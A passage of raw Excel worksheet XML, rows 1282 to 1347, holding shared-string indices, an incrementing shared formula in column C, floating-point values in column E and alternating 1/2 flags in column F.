        <v>1</v>
      </c>
    </row>
    <row r="1283" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1283" t="s">
        <v>2458</v>
      </c>
      <c r="B1283" t="s">
        <v>2459</v>
      </c>
      <c r="C1283">
        <f t="shared" si="19"/>
        <v>11036534</v>
      </c>
      <c r="D1283" t="s">
        <v>2460</v>
      </c>
      <c r="E1283">
        <v>8.5265455709304661E-5</v>
      </c>
      <c r="F1283">
        <v>2</v>
      </c>
    </row>
    <row r="1284" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1284" t="s">
        <v>2461</v>
      </c>
      <c r="B1284" t="s">
        <v>2462</v>
      </c>
      <c r="C1284">
        <f t="shared" si="19"/>
        <v>11037787</v>
      </c>
      <c r="D1284" t="s">
        <v>2463</v>
      </c>
      <c r="E1284">
        <v>26.5056266784668</v>
      </c>
      <c r="F1284">
        <v>1</v>
      </c>
    </row>
    <row r="1285" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1285" t="s">
        <v>2461</v>
      </c>
      <c r="B1285" t="s">
        <v>2462</v>
      </c>
      <c r="C1285">
        <f t="shared" si="19"/>
        <v>11039040</v>
      </c>
      <c r="D1285" t="s">
        <v>2464</v>
      </c>
      <c r="E1285">
        <v>1.104144334793091</v>
      </c>
      <c r="F1285">
        <v>2</v>
      </c>
    </row>
    <row r="1286" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1286" t="s">
        <v>2465</v>
      </c>
      <c r="B1286" t="s">
        <v>2466</v>
      </c>
      <c r="C1286">
        <f t="shared" si="19"/>
        <v>11040293</v>
      </c>
      <c r="D1286" t="s">
        <v>2467</v>
      </c>
      <c r="E1286">
        <v>23.921028137207031</v>
      </c>
      <c r="F1286">
        <v>1</v>
      </c>
    </row>
    <row r="1287" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1287" t="s">
        <v>2465</v>
      </c>
      <c r="B1287" t="s">
        <v>2466</v>
      </c>
      <c r="C1287">
        <f t="shared" si="19"/>
        <v>11041546</v>
      </c>
      <c r="D1287" t="s">
        <v>2468</v>
      </c>
      <c r="E1287">
        <v>4.0572986006736762E-2</v>
      </c>
      <c r="F1287">
        <v>2</v>
      </c>
    </row>
    <row r="1288" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1288" t="s">
        <v>2469</v>
      </c>
      <c r="B1288" t="s">
        <v>2470</v>
      </c>
      <c r="C1288">
        <f t="shared" si="19"/>
        <v>11042799</v>
      </c>
      <c r="D1288" t="s">
        <v>2471</v>
      </c>
      <c r="E1288">
        <v>30.747467041015621</v>
      </c>
      <c r="F1288">
        <v>1</v>
      </c>
    </row>
    <row r="1289" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1289" t="s">
        <v>2469</v>
      </c>
      <c r="B1289" t="s">
        <v>2472</v>
      </c>
      <c r="C1289">
        <f t="shared" si="19"/>
        <v>11044052</v>
      </c>
      <c r="D1289" t="s">
        <v>2473</v>
      </c>
      <c r="E1289">
        <v>5.2962207794189453</v>
      </c>
      <c r="F1289">
        <v>2</v>
      </c>
    </row>
    <row r="1290" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1290" t="s">
        <v>2474</v>
      </c>
      <c r="B1290" t="s">
        <v>2475</v>
      </c>
      <c r="C1290">
        <f t="shared" ref="C1290:C1353" si="20">C1289+1253</f>
        <v>11045305</v>
      </c>
      <c r="D1290" t="s">
        <v>2476</v>
      </c>
      <c r="E1290">
        <v>27.847747802734379</v>
      </c>
      <c r="F1290">
        <v>1</v>
      </c>
    </row>
    <row r="1291" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1291" t="s">
        <v>2474</v>
      </c>
      <c r="B1291" t="s">
        <v>2475</v>
      </c>
      <c r="C1291">
        <f t="shared" si="20"/>
        <v>11046558</v>
      </c>
      <c r="D1291" t="s">
        <v>2477</v>
      </c>
      <c r="E1291">
        <v>2.0966987609863281</v>
      </c>
      <c r="F1291">
        <v>2</v>
      </c>
    </row>
    <row r="1292" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1292" t="s">
        <v>2478</v>
      </c>
      <c r="B1292" t="s">
        <v>2479</v>
      </c>
      <c r="C1292">
        <f t="shared" si="20"/>
        <v>11047811</v>
      </c>
      <c r="D1292" t="s">
        <v>2480</v>
      </c>
      <c r="E1292">
        <v>25.584268569946289</v>
      </c>
      <c r="F1292">
        <v>1</v>
      </c>
    </row>
    <row r="1293" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1293" t="s">
        <v>2478</v>
      </c>
      <c r="B1293" t="s">
        <v>2479</v>
      </c>
      <c r="C1293">
        <f t="shared" si="20"/>
        <v>11049064</v>
      </c>
      <c r="D1293" t="s">
        <v>2481</v>
      </c>
      <c r="E1293">
        <v>10.83042049407959</v>
      </c>
      <c r="F1293">
        <v>2</v>
      </c>
    </row>
    <row r="1294" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1294" t="s">
        <v>2482</v>
      </c>
      <c r="B1294" t="s">
        <v>2483</v>
      </c>
      <c r="C1294">
        <f t="shared" si="20"/>
        <v>11050317</v>
      </c>
      <c r="D1294" t="s">
        <v>2484</v>
      </c>
      <c r="E1294">
        <v>22.916059494018551</v>
      </c>
      <c r="F1294">
        <v>1</v>
      </c>
    </row>
    <row r="1295" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1295" t="s">
        <v>2482</v>
      </c>
      <c r="B1295" t="s">
        <v>2483</v>
      </c>
      <c r="C1295">
        <f t="shared" si="20"/>
        <v>11051570</v>
      </c>
      <c r="D1295" t="s">
        <v>2485</v>
      </c>
      <c r="E1295">
        <v>2.6370076462626461E-2</v>
      </c>
      <c r="F1295">
        <v>2</v>
      </c>
    </row>
    <row r="1296" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1296" t="s">
        <v>2486</v>
      </c>
      <c r="B1296" t="s">
        <v>2487</v>
      </c>
      <c r="C1296">
        <f t="shared" si="20"/>
        <v>11052823</v>
      </c>
      <c r="D1296" t="s">
        <v>2488</v>
      </c>
      <c r="E1296">
        <v>22.931119918823239</v>
      </c>
      <c r="F1296">
        <v>1</v>
      </c>
    </row>
    <row r="1297" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1297" t="s">
        <v>2486</v>
      </c>
      <c r="B1297" t="s">
        <v>2487</v>
      </c>
      <c r="C1297">
        <f t="shared" si="20"/>
        <v>11054076</v>
      </c>
      <c r="D1297" t="s">
        <v>2489</v>
      </c>
      <c r="E1297">
        <v>10.981978416442869</v>
      </c>
      <c r="F1297">
        <v>2</v>
      </c>
    </row>
    <row r="1298" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1298" t="s">
        <v>2490</v>
      </c>
      <c r="B1298" t="s">
        <v>2491</v>
      </c>
      <c r="C1298">
        <f t="shared" si="20"/>
        <v>11055329</v>
      </c>
      <c r="D1298" t="s">
        <v>2492</v>
      </c>
      <c r="E1298">
        <v>18.5944938659668</v>
      </c>
      <c r="F1298">
        <v>1</v>
      </c>
    </row>
    <row r="1299" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1299" t="s">
        <v>2490</v>
      </c>
      <c r="B1299" t="s">
        <v>2491</v>
      </c>
      <c r="C1299">
        <f t="shared" si="20"/>
        <v>11056582</v>
      </c>
      <c r="D1299" t="s">
        <v>2493</v>
      </c>
      <c r="E1299">
        <v>11.628017425537109</v>
      </c>
      <c r="F1299">
        <v>2</v>
      </c>
    </row>
    <row r="1300" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1300" t="s">
        <v>2494</v>
      </c>
      <c r="B1300" t="s">
        <v>2495</v>
      </c>
      <c r="C1300">
        <f t="shared" si="20"/>
        <v>11057835</v>
      </c>
      <c r="D1300" t="s">
        <v>2496</v>
      </c>
      <c r="E1300">
        <v>30.186006546020511</v>
      </c>
      <c r="F1300">
        <v>1</v>
      </c>
    </row>
    <row r="1301" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1301" t="s">
        <v>2494</v>
      </c>
      <c r="B1301" t="s">
        <v>2495</v>
      </c>
      <c r="C1301">
        <f t="shared" si="20"/>
        <v>11059088</v>
      </c>
      <c r="D1301" t="s">
        <v>2497</v>
      </c>
      <c r="E1301">
        <v>4.1573704220354562E-4</v>
      </c>
      <c r="F1301">
        <v>2</v>
      </c>
    </row>
    <row r="1302" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1302" t="s">
        <v>2498</v>
      </c>
      <c r="B1302" t="s">
        <v>2499</v>
      </c>
      <c r="C1302">
        <f t="shared" si="20"/>
        <v>11060341</v>
      </c>
      <c r="D1302" t="s">
        <v>2500</v>
      </c>
      <c r="E1302">
        <v>30.5004997253418</v>
      </c>
      <c r="F1302">
        <v>1</v>
      </c>
    </row>
    <row r="1303" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1303" t="s">
        <v>2498</v>
      </c>
      <c r="B1303" t="s">
        <v>2499</v>
      </c>
      <c r="C1303">
        <f t="shared" si="20"/>
        <v>11061594</v>
      </c>
      <c r="D1303" t="s">
        <v>2501</v>
      </c>
      <c r="E1303">
        <v>7.8055629273876548E-5</v>
      </c>
      <c r="F1303">
        <v>2</v>
      </c>
    </row>
    <row r="1304" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1304" t="s">
        <v>2502</v>
      </c>
      <c r="B1304" t="s">
        <v>2503</v>
      </c>
      <c r="C1304">
        <f t="shared" si="20"/>
        <v>11062847</v>
      </c>
      <c r="D1304" t="s">
        <v>2504</v>
      </c>
      <c r="E1304">
        <v>28.806734085083011</v>
      </c>
      <c r="F1304">
        <v>1</v>
      </c>
    </row>
    <row r="1305" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1305" t="s">
        <v>2502</v>
      </c>
      <c r="B1305" t="s">
        <v>2503</v>
      </c>
      <c r="C1305">
        <f t="shared" si="20"/>
        <v>11064100</v>
      </c>
      <c r="D1305" t="s">
        <v>2505</v>
      </c>
      <c r="E1305">
        <v>13.93675422668457</v>
      </c>
      <c r="F1305">
        <v>2</v>
      </c>
    </row>
    <row r="1306" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1306" t="s">
        <v>2506</v>
      </c>
      <c r="B1306" t="s">
        <v>2507</v>
      </c>
      <c r="C1306">
        <f t="shared" si="20"/>
        <v>11065353</v>
      </c>
      <c r="D1306" t="s">
        <v>2508</v>
      </c>
      <c r="E1306">
        <v>29.51192665100098</v>
      </c>
      <c r="F1306">
        <v>1</v>
      </c>
    </row>
    <row r="1307" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1307" t="s">
        <v>2506</v>
      </c>
      <c r="B1307" t="s">
        <v>2507</v>
      </c>
      <c r="C1307">
        <f t="shared" si="20"/>
        <v>11066606</v>
      </c>
      <c r="D1307" t="s">
        <v>2509</v>
      </c>
      <c r="E1307">
        <v>13.31592464447021</v>
      </c>
      <c r="F1307">
        <v>2</v>
      </c>
    </row>
    <row r="1308" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1308" t="s">
        <v>2510</v>
      </c>
      <c r="B1308" t="s">
        <v>2511</v>
      </c>
      <c r="C1308">
        <f t="shared" si="20"/>
        <v>11067859</v>
      </c>
      <c r="D1308" t="s">
        <v>2512</v>
      </c>
      <c r="E1308">
        <v>26.378042221069339</v>
      </c>
      <c r="F1308">
        <v>1</v>
      </c>
    </row>
    <row r="1309" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1309" t="s">
        <v>2510</v>
      </c>
      <c r="B1309" t="s">
        <v>2511</v>
      </c>
      <c r="C1309">
        <f t="shared" si="20"/>
        <v>11069112</v>
      </c>
      <c r="D1309" t="s">
        <v>2513</v>
      </c>
      <c r="E1309">
        <v>14.145382881164551</v>
      </c>
      <c r="F1309">
        <v>2</v>
      </c>
    </row>
    <row r="1310" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1310" t="s">
        <v>2514</v>
      </c>
      <c r="B1310" t="s">
        <v>2515</v>
      </c>
      <c r="C1310">
        <f t="shared" si="20"/>
        <v>11070365</v>
      </c>
      <c r="D1310" t="s">
        <v>2516</v>
      </c>
      <c r="E1310">
        <v>22.4813117980957</v>
      </c>
      <c r="F1310">
        <v>1</v>
      </c>
    </row>
    <row r="1311" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1311" t="s">
        <v>2514</v>
      </c>
      <c r="B1311" t="s">
        <v>2515</v>
      </c>
      <c r="C1311">
        <f t="shared" si="20"/>
        <v>11071618</v>
      </c>
      <c r="D1311" t="s">
        <v>2517</v>
      </c>
      <c r="E1311">
        <v>1.6376650333404541</v>
      </c>
      <c r="F1311">
        <v>2</v>
      </c>
    </row>
    <row r="1312" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1312" t="s">
        <v>2518</v>
      </c>
      <c r="B1312" t="s">
        <v>2519</v>
      </c>
      <c r="C1312">
        <f t="shared" si="20"/>
        <v>11072871</v>
      </c>
      <c r="D1312" t="s">
        <v>2520</v>
      </c>
      <c r="E1312">
        <v>40.036300659179688</v>
      </c>
      <c r="F1312">
        <v>1</v>
      </c>
    </row>
    <row r="1313" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1313" t="s">
        <v>2518</v>
      </c>
      <c r="B1313" t="s">
        <v>2519</v>
      </c>
      <c r="C1313">
        <f t="shared" si="20"/>
        <v>11074124</v>
      </c>
      <c r="D1313" t="s">
        <v>2521</v>
      </c>
      <c r="E1313">
        <v>6.9539673626422882E-2</v>
      </c>
      <c r="F1313">
        <v>2</v>
      </c>
    </row>
    <row r="1314" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1314" t="s">
        <v>2522</v>
      </c>
      <c r="B1314" t="s">
        <v>2523</v>
      </c>
      <c r="C1314">
        <f t="shared" si="20"/>
        <v>11075377</v>
      </c>
      <c r="D1314" t="s">
        <v>2524</v>
      </c>
      <c r="E1314">
        <v>15.907505989074711</v>
      </c>
      <c r="F1314">
        <v>1</v>
      </c>
    </row>
    <row r="1315" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1315" t="s">
        <v>2522</v>
      </c>
      <c r="B1315" t="s">
        <v>2523</v>
      </c>
      <c r="C1315">
        <f t="shared" si="20"/>
        <v>11076630</v>
      </c>
      <c r="D1315" t="s">
        <v>2525</v>
      </c>
      <c r="E1315">
        <v>13.151644706726071</v>
      </c>
      <c r="F1315">
        <v>2</v>
      </c>
    </row>
    <row r="1316" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1316" t="s">
        <v>2526</v>
      </c>
      <c r="B1316" t="s">
        <v>2527</v>
      </c>
      <c r="C1316">
        <f t="shared" si="20"/>
        <v>11077883</v>
      </c>
      <c r="D1316" t="s">
        <v>2528</v>
      </c>
      <c r="E1316">
        <v>21.981716156005859</v>
      </c>
      <c r="F1316">
        <v>1</v>
      </c>
    </row>
    <row r="1317" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1317" t="s">
        <v>2526</v>
      </c>
      <c r="B1317" t="s">
        <v>2527</v>
      </c>
      <c r="C1317">
        <f t="shared" si="20"/>
        <v>11079136</v>
      </c>
      <c r="D1317" t="s">
        <v>2529</v>
      </c>
      <c r="E1317">
        <v>20.30893516540527</v>
      </c>
      <c r="F1317">
        <v>2</v>
      </c>
    </row>
    <row r="1318" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1318" t="s">
        <v>2530</v>
      </c>
      <c r="B1318" t="s">
        <v>2531</v>
      </c>
      <c r="C1318">
        <f t="shared" si="20"/>
        <v>11080389</v>
      </c>
      <c r="D1318" t="s">
        <v>2532</v>
      </c>
      <c r="E1318">
        <v>21.781343460083011</v>
      </c>
      <c r="F1318">
        <v>1</v>
      </c>
    </row>
    <row r="1319" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1319" t="s">
        <v>2530</v>
      </c>
      <c r="B1319" t="s">
        <v>2531</v>
      </c>
      <c r="C1319">
        <f t="shared" si="20"/>
        <v>11081642</v>
      </c>
      <c r="D1319" t="s">
        <v>2533</v>
      </c>
      <c r="E1319">
        <v>5.7952420320361853E-4</v>
      </c>
      <c r="F1319">
        <v>2</v>
      </c>
    </row>
    <row r="1320" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1320" t="s">
        <v>2534</v>
      </c>
      <c r="B1320" t="s">
        <v>2535</v>
      </c>
      <c r="C1320">
        <f t="shared" si="20"/>
        <v>11082895</v>
      </c>
      <c r="D1320" t="s">
        <v>2536</v>
      </c>
      <c r="E1320">
        <v>25.46026611328125</v>
      </c>
      <c r="F1320">
        <v>1</v>
      </c>
    </row>
    <row r="1321" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1321" t="s">
        <v>2534</v>
      </c>
      <c r="B1321" t="s">
        <v>2535</v>
      </c>
      <c r="C1321">
        <f t="shared" si="20"/>
        <v>11084148</v>
      </c>
      <c r="D1321" t="s">
        <v>2537</v>
      </c>
      <c r="E1321">
        <v>2.680001020431519</v>
      </c>
      <c r="F1321">
        <v>2</v>
      </c>
    </row>
    <row r="1322" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1322" t="s">
        <v>2538</v>
      </c>
      <c r="B1322" t="s">
        <v>2539</v>
      </c>
      <c r="C1322">
        <f t="shared" si="20"/>
        <v>11085401</v>
      </c>
      <c r="D1322" t="s">
        <v>2540</v>
      </c>
      <c r="E1322">
        <v>27.857255935668949</v>
      </c>
      <c r="F1322">
        <v>1</v>
      </c>
    </row>
    <row r="1323" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1323" t="s">
        <v>2538</v>
      </c>
      <c r="B1323" t="s">
        <v>2539</v>
      </c>
      <c r="C1323">
        <f t="shared" si="20"/>
        <v>11086654</v>
      </c>
      <c r="D1323" t="s">
        <v>2541</v>
      </c>
      <c r="E1323">
        <v>9.6728830337524414</v>
      </c>
      <c r="F1323">
        <v>2</v>
      </c>
    </row>
    <row r="1324" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1324" t="s">
        <v>2542</v>
      </c>
      <c r="B1324" t="s">
        <v>2543</v>
      </c>
      <c r="C1324">
        <f t="shared" si="20"/>
        <v>11087907</v>
      </c>
      <c r="D1324" t="s">
        <v>2544</v>
      </c>
      <c r="E1324">
        <v>27.83147048950195</v>
      </c>
      <c r="F1324">
        <v>1</v>
      </c>
    </row>
    <row r="1325" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1325" t="s">
        <v>2542</v>
      </c>
      <c r="B1325" t="s">
        <v>2543</v>
      </c>
      <c r="C1325">
        <f t="shared" si="20"/>
        <v>11089160</v>
      </c>
      <c r="D1325" t="s">
        <v>2545</v>
      </c>
      <c r="E1325">
        <v>7.4612236022949219</v>
      </c>
      <c r="F1325">
        <v>2</v>
      </c>
    </row>
    <row r="1326" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1326" t="s">
        <v>2546</v>
      </c>
      <c r="B1326" t="s">
        <v>2547</v>
      </c>
      <c r="C1326">
        <f t="shared" si="20"/>
        <v>11090413</v>
      </c>
      <c r="D1326" t="s">
        <v>2548</v>
      </c>
      <c r="E1326">
        <v>31.221530914306641</v>
      </c>
      <c r="F1326">
        <v>1</v>
      </c>
    </row>
    <row r="1327" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1327" t="s">
        <v>2546</v>
      </c>
      <c r="B1327" t="s">
        <v>2547</v>
      </c>
      <c r="C1327">
        <f t="shared" si="20"/>
        <v>11091666</v>
      </c>
      <c r="D1327" t="s">
        <v>2549</v>
      </c>
      <c r="E1327">
        <v>6.1728506088256836</v>
      </c>
      <c r="F1327">
        <v>2</v>
      </c>
    </row>
    <row r="1328" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1328" t="s">
        <v>2550</v>
      </c>
      <c r="B1328" t="s">
        <v>2551</v>
      </c>
      <c r="C1328">
        <f t="shared" si="20"/>
        <v>11092919</v>
      </c>
      <c r="D1328" t="s">
        <v>2552</v>
      </c>
      <c r="E1328">
        <v>22.16787147521973</v>
      </c>
      <c r="F1328">
        <v>1</v>
      </c>
    </row>
    <row r="1329" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1329" t="s">
        <v>2550</v>
      </c>
      <c r="B1329" t="s">
        <v>2551</v>
      </c>
      <c r="C1329">
        <f t="shared" si="20"/>
        <v>11094172</v>
      </c>
      <c r="D1329" t="s">
        <v>2553</v>
      </c>
      <c r="E1329">
        <v>11.12438488006592</v>
      </c>
      <c r="F1329">
        <v>2</v>
      </c>
    </row>
    <row r="1330" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1330" t="s">
        <v>2554</v>
      </c>
      <c r="B1330" t="s">
        <v>2555</v>
      </c>
      <c r="C1330">
        <f t="shared" si="20"/>
        <v>11095425</v>
      </c>
      <c r="D1330" t="s">
        <v>2556</v>
      </c>
      <c r="E1330">
        <v>34.672626495361328</v>
      </c>
      <c r="F1330">
        <v>1</v>
      </c>
    </row>
    <row r="1331" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1331" t="s">
        <v>2554</v>
      </c>
      <c r="B1331" t="s">
        <v>2555</v>
      </c>
      <c r="C1331">
        <f t="shared" si="20"/>
        <v>11096678</v>
      </c>
      <c r="D1331" t="s">
        <v>2557</v>
      </c>
      <c r="E1331">
        <v>4.7905979156494141</v>
      </c>
      <c r="F1331">
        <v>2</v>
      </c>
    </row>
    <row r="1332" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1332" t="s">
        <v>2558</v>
      </c>
      <c r="B1332" t="s">
        <v>2559</v>
      </c>
      <c r="C1332">
        <f t="shared" si="20"/>
        <v>11097931</v>
      </c>
      <c r="D1332" t="s">
        <v>2560</v>
      </c>
      <c r="E1332">
        <v>22.338300704956051</v>
      </c>
      <c r="F1332">
        <v>1</v>
      </c>
    </row>
    <row r="1333" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1333" t="s">
        <v>2558</v>
      </c>
      <c r="B1333" t="s">
        <v>2559</v>
      </c>
      <c r="C1333">
        <f t="shared" si="20"/>
        <v>11099184</v>
      </c>
      <c r="D1333" t="s">
        <v>2561</v>
      </c>
      <c r="E1333">
        <v>8.2722206115722656</v>
      </c>
      <c r="F1333">
        <v>2</v>
      </c>
    </row>
    <row r="1334" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1334" t="s">
        <v>2562</v>
      </c>
      <c r="B1334" t="s">
        <v>2563</v>
      </c>
      <c r="C1334">
        <f t="shared" si="20"/>
        <v>11100437</v>
      </c>
      <c r="D1334" t="s">
        <v>2564</v>
      </c>
      <c r="E1334">
        <v>21.86030387878418</v>
      </c>
      <c r="F1334">
        <v>1</v>
      </c>
    </row>
    <row r="1335" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1335" t="s">
        <v>2562</v>
      </c>
      <c r="B1335" t="s">
        <v>2563</v>
      </c>
      <c r="C1335">
        <f t="shared" si="20"/>
        <v>11101690</v>
      </c>
      <c r="D1335" t="s">
        <v>2565</v>
      </c>
      <c r="E1335">
        <v>16.960250854492191</v>
      </c>
      <c r="F1335">
        <v>2</v>
      </c>
    </row>
    <row r="1336" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1336" t="s">
        <v>2566</v>
      </c>
      <c r="B1336" t="s">
        <v>2567</v>
      </c>
      <c r="C1336">
        <f t="shared" si="20"/>
        <v>11102943</v>
      </c>
      <c r="D1336" t="s">
        <v>2568</v>
      </c>
      <c r="E1336">
        <v>22.199861526489261</v>
      </c>
      <c r="F1336">
        <v>1</v>
      </c>
    </row>
    <row r="1337" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1337" t="s">
        <v>2566</v>
      </c>
      <c r="B1337" t="s">
        <v>2567</v>
      </c>
      <c r="C1337">
        <f t="shared" si="20"/>
        <v>11104196</v>
      </c>
      <c r="D1337" t="s">
        <v>2569</v>
      </c>
      <c r="E1337">
        <v>12.90703868865967</v>
      </c>
      <c r="F1337">
        <v>2</v>
      </c>
    </row>
    <row r="1338" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1338" t="s">
        <v>2570</v>
      </c>
      <c r="B1338" t="s">
        <v>2571</v>
      </c>
      <c r="C1338">
        <f t="shared" si="20"/>
        <v>11105449</v>
      </c>
      <c r="D1338" t="s">
        <v>2572</v>
      </c>
      <c r="E1338">
        <v>31.54677581787109</v>
      </c>
      <c r="F1338">
        <v>1</v>
      </c>
    </row>
    <row r="1339" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1339" t="s">
        <v>2570</v>
      </c>
      <c r="B1339" t="s">
        <v>2571</v>
      </c>
      <c r="C1339">
        <f t="shared" si="20"/>
        <v>11106702</v>
      </c>
      <c r="D1339" t="s">
        <v>2573</v>
      </c>
      <c r="E1339">
        <v>0.88433665037155151</v>
      </c>
      <c r="F1339">
        <v>2</v>
      </c>
    </row>
    <row r="1340" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1340" t="s">
        <v>2574</v>
      </c>
      <c r="B1340" t="s">
        <v>2575</v>
      </c>
      <c r="C1340">
        <f t="shared" si="20"/>
        <v>11107955</v>
      </c>
      <c r="D1340" t="s">
        <v>2576</v>
      </c>
      <c r="E1340">
        <v>20.124233245849609</v>
      </c>
      <c r="F1340">
        <v>1</v>
      </c>
    </row>
    <row r="1341" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1341" t="s">
        <v>2574</v>
      </c>
      <c r="B1341" t="s">
        <v>2575</v>
      </c>
      <c r="C1341">
        <f t="shared" si="20"/>
        <v>11109208</v>
      </c>
      <c r="D1341" t="s">
        <v>2577</v>
      </c>
      <c r="E1341">
        <v>18.492238998413089</v>
      </c>
      <c r="F1341">
        <v>2</v>
      </c>
    </row>
    <row r="1342" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1342" t="s">
        <v>2578</v>
      </c>
      <c r="B1342" t="s">
        <v>2579</v>
      </c>
      <c r="C1342">
        <f t="shared" si="20"/>
        <v>11110461</v>
      </c>
      <c r="D1342" t="s">
        <v>2580</v>
      </c>
      <c r="E1342">
        <v>20.02060699462891</v>
      </c>
      <c r="F1342">
        <v>1</v>
      </c>
    </row>
    <row r="1343" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1343" t="s">
        <v>2578</v>
      </c>
      <c r="B1343" t="s">
        <v>2579</v>
      </c>
      <c r="C1343">
        <f t="shared" si="20"/>
        <v>11111714</v>
      </c>
      <c r="D1343" t="s">
        <v>2581</v>
      </c>
      <c r="E1343">
        <v>11.557906150817869</v>
      </c>
      <c r="F1343">
        <v>2</v>
      </c>
    </row>
    <row r="1344" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1344" t="s">
        <v>2582</v>
      </c>
      <c r="B1344" t="s">
        <v>2583</v>
      </c>
      <c r="C1344">
        <f t="shared" si="20"/>
        <v>11112967</v>
      </c>
      <c r="D1344" t="s">
        <v>2584</v>
      </c>
      <c r="E1344">
        <v>29.765329360961911</v>
      </c>
      <c r="F1344">
        <v>1</v>
      </c>
    </row>
    <row r="1345" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1345" t="s">
        <v>2582</v>
      </c>
      <c r="B1345" t="s">
        <v>2583</v>
      </c>
      <c r="C1345">
        <f t="shared" si="20"/>
        <v>11114220</v>
      </c>
      <c r="D1345" t="s">
        <v>2585</v>
      </c>
      <c r="E1345">
        <v>1.356145250611007E-3</v>
      </c>
      <c r="F1345">
        <v>2</v>
      </c>
    </row>
    <row r="1346" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1346" t="s">
        <v>2586</v>
      </c>
      <c r="B1346" t="s">
        <v>2587</v>
      </c>
      <c r="C1346">
        <f t="shared" si="20"/>
        <v>11115473</v>
      </c>
      <c r="D1346" t="s">
        <v>2588</v>
      </c>
      <c r="E1346">
        <v>33.926280975341797</v>
      </c>
      <c r="F1346">
        <v>1</v>
      </c>
    </row>
    <row r="1347" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1347" t="s">
        <v>2586</v>
      </c>
      <c r="B1347" t="s">
        <v>2587</v>
      </c>
      <c r="C1347">
        <f t="shared" si="20"/>
        <v>11116726</v>
      </c>
      <c r="D1347" t="s">
        <v>2589</v>
      </c>
      <c r="E1347">
        <v>7.2929030284285554E-3</v>
